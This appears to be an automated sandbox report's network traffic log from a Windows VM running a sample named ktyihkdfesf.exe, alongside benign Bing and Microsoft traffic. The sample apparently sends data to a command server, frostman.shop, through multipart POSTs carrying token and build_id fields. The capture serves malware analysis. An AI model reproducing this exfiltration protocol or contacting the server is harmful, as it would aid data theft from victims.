                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:20 GMT
                                                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
2024-12-20 06:31:20 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-20 06:31:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 49776 | 150.171.27.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:21 UTC | 375 | OUT | GET /th?id=OADD2.10239340418602_13EDNGC3ZL2WGZFXN&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:21 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 407830
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: C3F748532B6E444AAACD9B5E18DF0AFA Ref B: EWR30EDGE0307 Ref C: 2024-12-20T06:31:21Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:20 GMT
                                                                                                                                                                                                                                                                                                Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
26  192.168.2.6  49777  150.171.27.10  443
Timestamp  Bytes transferred  Direction  Data
2024-12-20 06:31:21 UTC  346  OUT  GET /th?id=OADD2.10239340418601_1XRLHD1YRS9ZZSDWX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-20 06:31:22 UTC  854  IN  HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 453802
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 7D577CCA80FA480FBC36152E3E3D359A Ref B: EWR30EDGE0115 Ref C: 2024-12-20T06:31:21Z
Date: Fri, 20 Dec 2024 06:31:21 GMT
Connection: close
                                                                                                                                                                                                                                                                                                Data Ascii: oiWb"WF7v{OD)OP@%vf^#,n-B_2Y-n@~RZG>}qc"08i7_I1^YDk66#:?rZ6*Z&zUs<38V2Az"^?~x2e#
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: fd 1a 3b 66 8a 3b 55 f9 59 97 6a aa 1e 7e 5f 4f eb 4b e1 fb cb 9d 3e e9 af 74 8b 1f 35 67 51 0f 97 b7 63 29 27 e5 1f ec 8c f3 c5 36 fa c6 fe db 56 9e e7 57 bc fb 65 da a0 12 47 0c 86 44 86 33 c9 27 b6 05 65 18 a5 59 4a ff 00 23 aa 32 fd cf 2d b5 7d 4c bd 3f 51 d4 34 88 63 b8 8a 76 8e 4f 28 ec fe ee 0f 50 7b 9c 8a a7 af 5e 49 2e b1 3c a6 06 8f ed 4c b3 6c 8f fe 59 83 cf 53 cf bd 6c d8 0d 32 6b 59 0e a2 de 7c d2 3b 79 4d 17 4c 0f ba 3e 87 26 b2 bc 49 34 b1 cd 1c 56 f0 46 bb 63 03 72 fd f6 e7 ab 66 ba 60 ef 3d b5 39 aa 26 a1 be 84 5a ad 85 b4 93 2d cd e2 fd 94 49 8d b1 f5 91 b3 d0 af 6c 7f 2a a3 79 3c 90 d9 c9 6c 7c b8 83 61 f7 7d e7 5e dd 7d eb aa f3 af 35 cf 0d ac 5a 8e 9f e5 5c c1 81 6d 3c 7f f2 d0 20 fb a5 7a e7 df a1 35 91 a8 43 04 1e 19 c3 c1 b6 5f b6
                                                                                                                                                                                                                                                                                                Data Ascii: ;f;UYj~_OK>t5gQc)'6VWeGD3'eYJ#2-}L?Q4cvO(P{^I.<LlYSl2kY|;yML>&I4VFcrf`=9&Z-Il*y<l|a}^}5Z\m< z5C_
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: 62 9d 8a 3a d0 03 5a 91 85 3b 1e d4 84 50 02 51 4a 45 23 50 03 5a 8a 75 26 28 01 94 63 da 9d 4d a0 56 06 14 98 a7 35 18 a7 70 b0 cc 7b 51 8f 6a 75 26 28 b8 58 6e 29 31 ed 52 53 71 ed 45 c2 c3 71 ed 48 c2 9e c2 93 14 c5 61 98 f6 a3 1e d4 ec 7b 50 d4 00 c6 14 8c 2a 4a 6d 00 37 1e d4 98 a7 62 86 14 00 cc 7b 52 63 14 fc 7b 51 40 0c c5 26 3d a9 f8 a4 c7 b5 00 37 1e d4 98 a7 62 8c 50 03 28 61 4e f9 69 31 40 0c a5 6a 76 29 94 ee 2b 05 36 9f 8a 46 14 5c 2c 26 29 1a 9d 8f 6a 28 b8 58 8e 95 a9 69 b4 5c 41 45 2e 29 29 00 53 69 d4 50 03 71 ed 4d a7 51 40 0d a4 c5 2d 0d 40 09 8a 4a 5c 52 d3 b8 0d a6 d3 a8 eb 45 c5 61 b4 51 45 31 08 d4 b4 51 40 0d a6 d4 94 da 00 6d 14 ea 46 a0 04 a8 2f d6 e0 db e6 d1 95 65 5e 55 64 5d cb 20 1d 57 f1 f5 ec 6a 7a 31 9a 00 cd f0 e6 b1 67
                                                                                                                                                                                                                                                                                                Data Ascii: b:Z;PQJE#PZu&(cMV5p{Qju&(Xn)1RSqEqHa{P*Jm7b{Rc{Q@&=7bP(aNi1@jv)+6F\,&)j(Xi\AE.))SiPqMQ@-@J\REaQE1Q@mF/e^Ud] Wjz1g
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16067INData Raw: 03 31 46 05 2d 0c 28 01 b4 8c 29 d8 a5 a0 08 f1 ed 46 3d a9 d4 da 35 01 31 8a 46 a7 51 4e e0 31 86 69 2a 4a 6b 0a 2e 03 5a 93 ad 3b 14 62 8b a0 19 4d a9 1a 8a 2e 03 1a 91 bf f1 da 76 3d a8 61 45 c0 66 29 68 c7 b5 18 f6 a2 e0 33 14 35 3e 9b 4c 56 1b 45 2e 29 18 50 20 a6 b5 3a 93 19 a7 70 19 4b fc 54 b4 66 8b 80 d6 07 14 51 46 3d a8 b8 0c c5 25 3f 14 62 8b a1 58 65 14 ea 6d 31 0d 61 4d a9 31 ed 49 8a 00 63 51 4e c7 b5 26 28 01 ac 0e ea 4a 76 3d a8 61 40 11 d2 e2 9d 8a 4c 7b 50 03 68 a5 c6 29 28 00 a6 e3 da 9d 45 00 36 91 a9 68 a0 56 1b 43 51 45 02 1a d4 63 da 9d 45 00 47 45 3b 1e d4 da 00 28 a2 8a 00 4c 52 63 da 95 a8 6a 00 6e 29 31 4e a3 1e d4 ee 2b 0c c7 e7 49 29 11 a3 b9 e9 1a 92 df 87 35 c3 7c 4c f8 a1 e0 ff 00 0b dd 36 99 af 6b d1 e8 f2 06 c3 7d ad 5c
                                                                                                                                                                                                                                                                                                Data Ascii: 1F-()F=51FQN1i*Jk.Z;bM.v=aEf)h35>LVE.)P :pKTfQF=%?bXem1aM1IcQN&(Jv=a@L{Ph)(E6hVCQEcEGE;(LRcjn)1N+I)5|L6k}\
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: 86 2b aa f8 77 6a 9a b4 d7 da 4b ac 91 ff 00 69 5a 37 94 ab 3e c4 f3 10 6e 1b f3 db 8a 25 1d 0d 28 a6 df 2f 73 07 4b d4 64 b8 99 43 c0 d2 0d c1 be f6 d5 91 c7 f7 8f 6a bd 30 9a de 48 61 13 b4 9e 63 67 f7 59 dc df de fa 6d a8 b4 2b 73 6f 71 10 db 1e ed c5 24 66 f9 9a 33 e8 2a cf 8a 2c a4 8a de 3b e4 8a 78 fe d3 21 2a aa bb 51 93 18 24 01 f7 73 de b3 94 52 96 9b 07 2b 50 bb dc c8 b8 62 fa b2 c7 25 dc 9f 65 dd f7 a3 fe 20 39 e2 b6 ed e0 dd 6a b1 c5 17 97 12 c8 0b c9 e6 7f 1f 61 ec dd 2b 0a c7 4f 9e 6d c0 6e f9 7e 76 66 8f e5 c0 e9 83 db 9a e8 b5 47 df 67 6b 6e 2d a3 61 e5 8f 95 9b b8 ec 1b a1 3e f8 a8 ab f1 24 99 34 af 7d 8b b6 13 59 5a da cb 0b 79 7a 96 ef bd b9 48 11 be 7b b9 eb f4 1c 55 0b 8b 10 be 6a 5e 2d b4 f7 17 32 66 35 81 bf d5 9c e4 11 f4 e9 8a ce
                                                                                                                                                                                                                                                                                                Data Ascii: +wjKiZ7>n%(/sKdCj0HacgYm+soq$f3*,;x!*Q$sR+Pb%e 9ja+Omn~vfGgkn-a>$4}YZyzH{Uj^-2f5
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: 7d e5 84 9e b9 1d cf d7 ad 73 fb 1e 5b f5 67 4f b6 4d 5b 61 37 08 61 9e 09 15 59 a5 c1 56 5f e1 c7 f4 f6 a8 65 4b 26 ba 84 89 57 6b 36 24 6f ee f6 cf e2 6a 47 90 bd af ef 62 95 8e d1 ba 46 f9 7b e4 8f 6a af 15 be 6c db 0a aa f2 3e 37 33 6e 6f ca a9 47 76 73 ca 2d 3f 23 77 c3 3e 55 a5 c4 f2 8d bf 67 66 2a cc cd f2 e7 b6 3f c2 93 5c bd 02 ce ea 28 db cc 33 46 37 7c a7 6b 1c f6 f5 c7 5a 49 2c ed e0 bc 58 87 98 d1 b4 61 64 69 18 2e d3 8e c3 a6 49 f4 a8 54 c5 37 f0 f9 86 05 09 e5 ff 00 0e 33 8c f3 eb f9 d7 2b 49 cb 9f 73 a9 d5 fd df 22 31 af e7 b8 10 cb 34 8a b9 69 d4 b7 cd f7 40 1c 0e 2a dd a5 c2 a5 bc 51 1d cb 33 64 ed da 36 e0 f4 19 ad 96 b4 48 a4 8a 43 3e d2 cb 95 8d 54 32 36 3a 73 59 f7 36 e2 48 e4 96 4d aa b1 63 ee b7 0c 73 fc ab a6 35 14 d1 cd ca ef 7b
                                                                                                                                                                                                                                                                                                Data Ascii: }s[gOM[a7aYV_eK&Wk6$ojGbF{jl>73noGvs-?#w>Ugf*?\(3F7|kZI,Xadi.IT73+Is"14i@*Q3d6HC>T26:sY6HMcs5{


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 49799 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:24 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 505
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:24 UTC | 505 | OUT | Data Ascii: ------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------AAAAAAAAAAAAAAAAAAAACont
2024-12-20 06:31:25 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:25 UTC | 12 | IN | Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port
28 | 192.168.2.6 | 49796 | 20.198.119.143 | 443

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:25 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: u5pEWmZTIke7h+kw.1Context: f2f49da0942c63a3
2024-12-20 06:31:25 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-20 06:31:25 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: u5pEWmZTIke7h+kw.2Context: f2f49da0942c63a3<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
2024-12-20 06:31:25 UTC | 74 | OUT | Data Ascii: BND 3 CON\QOS 56MS-CV: u5pEWmZTIke7h+kw.3Context: f2f49da0942c63a3
2024-12-20 06:31:25 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-20 06:31:25 UTC | 58 | IN | Data Ascii: MS-CV: HhjA40hYkE6D1t2zFQHAmg.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 49805 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:26 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KXBA1VAI58YMYU379R1D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:26 UTC | 16355 | OUT | Data Ascii: ------KXBA1VAI58YMYU379R1DContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------KXBA1VAI58YMYU379R1DContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------KXBA1VAI58YMYU379R1DCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-20 06:31:28 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 49813 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:28 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----X4ECT0ZMOZUAAA1VSRI5
